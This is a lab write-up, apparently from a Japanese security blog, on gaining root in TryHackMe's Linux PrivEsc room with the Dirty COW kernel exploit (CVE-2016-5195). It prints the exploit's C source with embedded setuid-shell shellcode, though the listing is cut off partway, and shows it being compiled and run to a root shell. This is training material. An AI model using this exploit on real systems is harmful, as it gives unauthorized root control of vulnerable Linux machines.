![[CVE-2016-5195] Improvement of privilege using Kernel exploits! TryHackMe Linux PrivEsc Writeup Part 10](https://hack-lab-256.com/wp-content/uploads/2023/04/hack-lab-256-samnail-16.jpg)
This time, we will try "Elevation of privileges using Kernel exploits."
The target machine uses the Room below of TryHackMe.
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc "
TryHackMe
Linux PrivEsc
Practice your Linux Privilege Escalation skills on an intentionally missconfigured Debian VM with multiple ways to get root! SSH is available. Credentials: user:…
This article is part 10.
If you would like to check Writeup for Linux PrivEsc with TryHackMe, please also check Electronic privileges exploiting backups of history files, config files, and important files
Recommended reference books
Author: IPUSIRON
¥2,090 (As of 15:33 on 2025/07/13 | Amazon research)
Pochip
Pochip
Author: Justin Seitz, Author: Tim Arnold, Supervised by: Mantani Nobutaka, Translation: Arai Yu, Translation: Kakara Hirosei, Translation: Murakami Ryo
¥3,520 (As of 12:26 on 07/09/2025 | Amazon research)
Pochip
Author: Tokumaru Hiroshi
¥3,520 (As of 00:44 on 2025/07/12 | Amazon research)
Pochip
table of contents
Preparation
First, start the target machine with Start Machine.
It's OK if IP Address is displayed.
This time, since it is escalated to privileges, I'll check to see where it can be connected via ssh.
Connect using "user/password321" as shown in TryHackMe.
┌──(hacklab㉿hacklab)-[~/tryhackme/linuxprv] └─$ ssh user@10.10.175.49 130 ⨯ user@10.10.175.49's password: Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri May 15 06:41:23 2020 from 192.168.1.125Kernel Exploits
A kernel exploit is an exploit that creates vulnerabilities in the kernel itself, such as Linux and Windows.
Essentially, the kernel operates in the highest privileged mode within the system, so if misused you will have almost all of the system under control.
First, we will use Linux Exploit Suggester 2 to identify potential kernel exploits on your current system.
user@debian:~$ perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl ##### Linux Exploit Suggester 2 ##### Local Kernel: 2.6.32 Searching 72 exploits... Possible Exploits [1] american-sign-language CVE-2010-4347 Source: http://www.securityfocus.com/bid/45408 [2] can_bcm CVE-2010-2959 Source: http://www.exploit-db.com/exploits/14814 [3] dirty_cow CVE-2016-5195 Source: http://www.exploit-db.com/exploits/40616 [4] exploit_x CVE-2018-14665 Source: http://www.exploit-db.com/exploits/45697 [5] half_nelson1 Alt: econet CVE-2010-3848 Source: http://www.exploit-db.com/exploits/17787 [6] half_nelson2 Alt: econet CVE-2010-3850 Source: http://www.exploit-db.com/exploits/17787 [7] half_nelson3 Alt: econet CVE-2010-4073 Source: http://www.exploit-db.com/exploits/17787 [8] msr CVE-2013-0268 Source: http://www.exploit-db.com/exploits/27297 [9] pktcdvd CVE-2010-3437 Source: http://www.exploit-db.com/exploits/15150 [10] ptrace_kmod2 Alt: ia32syscall,robert_you_suck CVE-2010-3301 Source: http://www.exploit-db.com/exploits/15023 [11] rawmodePTY CVE-2014-0196 Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c [12] rds CVE-2010-3904 Source: http://www.exploit-db.com/exploits/15285 [13] reiserfs CVE-2010-1146 Source: http://www.exploit-db.com/exploits/12130 [14] video4linux CVE-2010-3081 Source: http://www.exploit-db.com/exploits/15024There are many lists, but let's exploit the famous ones below.
[3] dirty_cow CVE-2016-5195 Source: http://www.exploit-db.com/exploits/40616
You may also want to read
Dirty COW (CVE-2016-5195)
Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel.
Using " https://dirtycow.ninja/ (A backup of /usr/bin/password will be created in /tmp/back.)
user@debian:~$ cat /home/user/tools/kernel-exploits/dirtycow/c0w.c /* * A PTRACE_POKEDATA variant of CVE-2016-5195 * should work on RHEL 5 & 6 * * (un)comment correct payload (x86 or x64)! * $ gcc -pthread c0w.c -o c0w * $ ./c0w * DirtyCow root privilege escalation * Backing up /usr/bin/passwd.. to /tmp/bak * mmap fa65a000 * madvise 0 * ptrace 0 * $ /usr/bin/passwd * [root@server foo]# whoami * root * [root@server foo]# id * uid=0(root) gid=501(foo) groups=501(foo) * @KrE80r */ #include<fcntl.h> #include<pthread.h> #include<string.h> #include<stdio.h> #include<stdint.h> #include<sys/mman.h> #include<sys/stat.h> #include<sys/types.h> #include<sys/wait.h> #include<sys/ptrace.h> #include<unistd.h> int f; void *map; pid_t pid; pthread_t pth; struct stat st; // change if no permissions to read char suid_binary[] = "/usr/bin/passwd"; /* * $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i */ unsigned char shell_code[] = { 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05 }; unsigned int sc_len = 177; /* * $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i unsigned char shell_code[] = { 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00, 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x10, 0x00, 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52, 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53, 0x89, 0xe1, 0xcd, 0x80 }; unsigned int sc_len = 136; */ void *madviseThread(void *arg) { int i,c=0; for(i=0;i<200000000;i++) c+=madvise(map,100,MADV_DONTNEED); printf("madvise %d\n\n",c); } int main(int argc,char *argv[]){ printf(" \n\ (___) \n\ (oo)_____/ \n\ @@ ` \\ \n\ \\ ____, /%s \n\ // // \n\ ^^ ^^ \n\ ", suid_binary); char *backup; printf("DirtyCow root privilege escalation\n"); printf("Backing up %s to /tmp/bak\n", suid_binary); asprintf(&backup, "cp %s /tmp/bak", suid_binary); system(backup); f=open(suid_binary,O_RDONLY); fstat(f,&st); map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0); printf("mmap %x\n\n",map); pid=fork(); if(pid){ waitpid(pid,NULL,0); int u,i,o,c=0,l=sc_len; for(i=0;i<10000/l;i++) for(o=0;o
Compile and run the code.
user@debian:~$ gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w user@debian:~$ ./c0w (___) (oo)_____/ @@ ` \ \ ____, //usr/bin/passwd // // ^^ ^^ DirtyCow root privilege escalation Backing up /usr/bin/passwd to /tmp/bak mmap 534b7000 madvise 0 ptrace 0
I think I was able to obtain root privileges by running /usr/bin/passwd!
user@debian:~$ /usr/bin/passwd root@debian:/home/user# whoami rootsummary
This time, I tried "Privilege Elevation Using Kernel Exploits."
It may have been a bit surprising to see that there are as many as 14 vulnerabilities in kernel exploits alone.
As it is a last resort, I don't know if I'll use it in the future, but I have to remember.
References and Sites
--
![[HackTheBox] What to do if "An error of type HTTPClient::ReceiveTimeoutError happened, message is executed expired" appears in Evil-WinRM](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306] I enumerated the shared Samba, manipulate a vulnerable version of proftpd, and escalated privileges by manipulating path variables! TryHackMe Kenobi Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[Permanent CTF for beginners] setodaNote CTF WEB Writeup! Recommended for getting a sense of CTF!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[TryHackMe] We conducted packet analysis using wireshark to investigate the intrusion of ssh-backdoor! Overpass2 Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-300x169.jpg)
![[CVE-2018-16763] fuel CMS 1.4.1 - I converted Remote Code Execution (1) to python 3 and hacked it! TryHackMe Ignite Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[TryHackMe] I used SSH2John to extract the hash from the private key and hacked the password with John the Ripper! Overpass Writeup](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[TryHackMe] I tried infiltrating a Windows machine with a ret2esp attack (Buffer Overflow)! Brainstorm Writeup](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)